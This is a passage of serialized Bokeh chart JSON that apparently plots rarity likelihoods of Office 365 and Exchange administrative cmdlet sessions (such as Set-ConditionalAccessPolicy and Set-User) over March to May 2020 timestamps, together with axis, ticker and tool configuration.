N\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\"],\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[0,1,2,3,4,5,6,7,8,11,15,19,23,27,31,35,39,42,45,46,49,54,128,130,131,132,134,138,139,142,147,148,149,150,151,152,153,154,157,158,160,161,162,163,165,166,167,169,170,172,173,174,175,177,178,179,180,181,183,184,186,188,189,190,191,192,193,194,196,197,198,199,201,203,205,206,208,210,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,229,230,231,232,235,238,240,241,242,243,244,247,254,255,257,258,259,261,263,267,268,272,275,277,291,293,299,307,308,309,313,320,322,323,326,329,335,339,344,349,350,352,354,357,360,362,366,367,374,375,378,383,387,388,389,391,392,393,394,396,397],\"rarest_window3\":[[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-Mailbox\",\"Set-Mailbox\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Remove-MailboxLocation\",\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"New-App\",\"New-App\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-OwaMailboxPolicy\",\"Set-Mailbox\",\"Add-MailboxPermission\"],[\"Set-OwaMailboxPolicy\",\"Set-Mailbox\",\"Add-MailboxPermission\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-MailboxLocation\",\"Set-User\"],[\"Set-ExchangeAssistanceConfig\",\"Set-AdminAuditLogConfig\",\"Set-TenantObjectVersion\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Remove-UnifiedGroup\",\"Remove-UnifiedGroup\"],[\"Set-ExchangeAssistanceConfig\",\"Set-TransportConfig\",\"Set-RecipientEnforcementProvisioningPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"]],\"rarest_window3_likelihood\":{\"__ndarray__\":\"Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj/mk1whRthQP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP5NgdAvEKk0/k2B0C8QqTT9nym6baQuoP8emX9S7ybM/x6Zf1LvJsz9nym6baQuoP2fKbptpC6g/x6Zf1LvJsz/Hpl/Uu8mzP4ATX5xAOPY+x6Zf1LvJsz/Hpl/Uu8mzP5NgdAvEKk0/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/x6Zf1LvJsz8HG9tEBpltPwcb20QGmW0/wXgr+xxSMz/hF2+OujY0P8emX9S7ybM/Z8pum2kLqD/Hpl/Uu8mzP5NgdAvEKk0/x6Zf1LvJsz9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP+aTXCFG2FA/x6Zf1LvJsz9nym6baQuoP8emX9S7ybM/Z8pum2kLqD/Hpl/Uu8mzP2fKbptpC6g/5pNcIUbYUD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/BxvbRAaZbT9nym6baQuoP2fKbptpC6g/iY+KUFZE/T5nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD/+10yLIUEWP/7XTIshQRY/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP7kzgspBKhU/Z8pum2kLqD9nym6baQuoPzPMHyOt0Ts/M8wfI63ROz8zzB8jrdE7PwKauiszdhA/BlI6ubqfPj9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP2fKbptpC6g/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/Z8pum2kLqD+5U0mWClemP2fKbptpC6g/5pNcIUbYUD9nym6baQuoP7lTSZYKV6Y/x6Zf1LvJsz/nmqaw4HdEP8emX9S7ybM/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/Z8pum2kLqD8=\",\"dtype\":\"float64\",\"shape\":[154]},\"time_col\":[\"2020-05-12 01:34:59+00:00\",\"2020-05-12 04:48:43+00:00\",\"2020-05-20 02:18:27+00:00\",\"2020-05-20 05:12:55+00:00\",\"2020-05-21 01:50:12+00:00\",\"2020-05-21 04:32:03+00:00\",\"2020-05-22 02:13:21+00:00\",\"2020-05-22 04:54:58+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-19 16:46:51+00:00\",\"2020-05-19 22:48:50+00:00\",\"2020-05-20 04:50:35+00:00\",\"2020-05-20 10:52:47+00:00\",\"2020-05-20 16:54:39+00:00\",\"2020-05-20 22:56:57+00:00\",\"2020-05-21 04:58:21+00:00\",\"2020-05-21 10:59:57+00:00\",\"2020-05-21 13:00:51+00:00\",\"2020-05-21 19:02:18+00:00\",\"2020-05-21 22:52:47+00:00\",\"2020-05-22 04:54:26+00:00\",\"2020-05-22 10:58:25+00:00\",\"2020-03-24 14:56:52+00:00\",\"2020-03-24 15:05:18+00:00\",\"2020-03-24 15:08:48+00:00\",\"2020-03-24 15:22:13+00:00\",\"2020-03-24 15:54:15+00:00\",\"2020-03-24 16:44:25+00:00\",\"2020-03-24 17:00:41+00:00\",\"2020-03-26 18:06:26+00:00\",\"2020-03-26 18:41:40+00:00\",\"2020-03-26 18:44:40+00:00\",\"2020-03-26 18:53:51+00:00\",\"2020-03-26 19:11:11+00:00\",\"2020-03-26 19:18:22+00:00\",\"2020-03-26 19:25:24+00:00\",\"2020-03-26 19:33:04+00:00\",\"2020-03-26 19:42:54+00:00\",\"2020-03-26 22:40:30+00:00\",\"2020-03-27 14:34:51+00:00\",\"2020-03-27 14:59:24+00:00\",\"2020-03-27 15:12:37+00:00\",\"2020-03-27 15:15:11+00:00\",\"2020-03-27 15:21:28+00:00\",\"2020-03-27 15:37:57+00:00\",\"2020-03-27 16:09:20+00:00\",\"2020-03-31 02:19:26+00:00\",\"2020-04-01 20:12:19+00:00\",\"2020-04-02 09:01:22+00:00\",\"2020-04-02 14:02:50+00:00\",\"2020-04-02 14:05:54+00:00\",\"2020-04-04 10:43:38+00:00\",\"2020-04-05 21:17:39+00:00\",\"2020-04-06 08:25:34+00:00\",\"2020-04-06 08:40:49+00:00\",\"2020-04-06 08:45:08+00:00\",\"2020-04-06 18:28:22+00:00\",\"2020-04-07 19:29:10+00:00\",\"2020-04-07 21:50:17+00:00\",\"2020-04-08 16:29:58+00:00\",\"2020-04-08 16:38:23+00:00\",\"2020-04-08 16:45:26+00:00\",\"2020-04-08 16:59:37+00:00\",\"2020-04-08 17:03:19+00:00\",\"2020-04-08 17:31:38+00:00\",\"2020-04-08 17:35:18+00:00\",\"2020-04-09 16:56:54+00:00\",\"2020-04-09 17:01:23+00:00\",\"2020-04-09 17:17:28+00:00\",\"2020-04-09 17:21:53+00:00\",\"2020-04-09 17:26:16+00:00\",\"2020-04-09 17:38:32+00:00\",\"2020-04-09 17:52:48+00:00\",\"2020-04-09 18:09:58+00:00\",\"2020-04-15 03:13:51+00:00\",\"2020-04-15 06:14:35+00:00\",\"2020-04-16 02:49:02+00:00\",\"2020-04-16 06:06:35+00:00\",\"2020-04-16 22:46:54+00:00\",\"2020-04-17 03:29:24+00:00\",\"2020-04-17 06:13:17+00:00\",\"2020-04-17 21:00:31+00:00\",\"2020-04-18 01:38:36+00:00\",\"2020-04-18 04:50:30+00:00\",\"2020-04-19 02:55:49+00:00\",\"2020-04-20 03:02:34+00:00\",\"2020-04-20 06:04:29+00:00\",\"2020-04-22 03:12:39+00:00\",\"2020-04-23 06:07:23+00:00\",\"2020-04-23 21:42:48+00:00\",\"2020-04-24 03:12:12+00:00\",\"2020-04-24 06:00:47+00:00\",\"2020-04-25 06:18:01+00:00\",\"2020-04-26 02:42:04+00:00\",\"2020-04-26 06:09:29+00:00\",\"2020-04-27 03:17:16+00:00\",\"2020-04-28 06:08:58+00:00\",\"2020-04-29 15:01:44+00:00\",\"2020-04-30 02:48:54+00:00\",\"2020-04-30 06:02:13+00:00\",\"2020-04-30 22:09:32+00:00\",\"2020-05-01 03:11:34+00:00\",\"2020-05-01 05:59:09+00:00\",\"2020-05-01 10:55:14+00:00\",\"2020-05-02 11:31:53+00:00\",\"2020-05-05 02:56:24+00:00\",\"2020-05-05 06:21:38+00:00\",\"2020-05-05 16:47:31+00:00\",\"2020-05-05 16:55:05+00:00\",\"2020-05-05 17:23:30+00:00\",\"2020-05-06 01:49:17+00:00\",\"2020-05-06 02:51:10+00:00\",\"2020-05-08 03:12:52+00:00\",\"2020-05-08 05:52:11+00:00\",\"2020-05-09 02:58:45+00:00\",\"2020-05-11 01:58:14+00:00\",\"2020-05-11 04:57:16+00:00\",\"2020-05-14 02:07:32+00:00\",\"2020-05-14 05:04:33+00:00\",\"2020-05-15 03:09:56+00:00\",\"2020-05-16 06:05:56+00:00\",\"2020-05-16 06:48:04+00:00\",\"2020-05-16 09:20:17+00:00\",\"2020-05-16 15:22:05+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-17 03:04:51+00:00\",\"2020-05-17 03:14:05+00:00\",\"2020-05-17 03:54:47+00:00\",\"2020-05-17 09:56:20+00:00\",\"2020-05-17 15:57:55+00:00\",\"2020-05-17 21:59:40+00:00\",\"2020-05-18 04:01:35+00:00\",\"2020-05-18 09:02:19+00:00\",\"2020-05-18 10:03:01+00:00\",\"2020-05-18 12:12:55+00:00\",\"2020-05-18 15:02:53+00:00\",\"2020-05-18 18:15:15+00:00\",\"2020-05-18 22:41:41+00:00\",\"2020-05-19 01:58:06+00:00\",\"2020-05-19 04:43:13+00:00\",\"2020-05-19 05:13:27+00:00\",\"2020-05-19 09:54:28+00:00\",\"2020-05-19 10:02:31+00:00\",\"2020-05-19 10:45:23+00:00\",\"2020-05-19 11:14:31+00:00\",\"2020-05-19 13:29:55+00:00\",\"2020-05-19 13:44:48+00:00\",\"2020-05-19 13:48:08+00:00\",\"2020-05-19 13:55:42+00:00\",\"2020-05-19 13:58:13+00:00\",\"2020-05-19 14:01:02+00:00\",\"2020-05-19 14:06:06+00:00\",\"2020-05-19 14:27:14+00:00\",\"2020-05-19 14:30:31+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1092\"},\"selection_policy\":{\"id\":\"1093\"}},\"id\":\"1037\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"axis\":{\"id\":\"1018\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1021\",\"type\":\"Grid\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated_min\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1064\",\"type\":\"Circle\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1095\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1096\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1098\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"1062\"}},\"id\":\"1067\",\"type\":\"CDSView\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1097\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1027\"}},\"id\":\"1023\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1106\",\"type\":\"YearsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated_min\"},\"y\":{\"field\":\"rarest_window3_likelihood\"}},\"id\":\"1039\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"1062\"},\"glyph\":{\"id\":\"1064\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1065\"},\"selection_glyph\":null,\"view\":{\"id\":\"1067\"}},\"id\":\"1066\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"SaveTool\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1102\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1026\",\"type\":\"PanTool\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1083\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1103\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1002\"},{\"id\":\"1022\"},{\"id\":\"1023\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"}]},\"id\":\"1028\",\"type\":\"Toolbar\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1099\",\"type\":\"DaysTicker\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1059\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1101\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1590907598950.0002,\"start\":1584299318049.9998},\"id\":\"1046\",\"type\":\"Range1d\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1105\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1080\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data\":{\"ClientIP\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"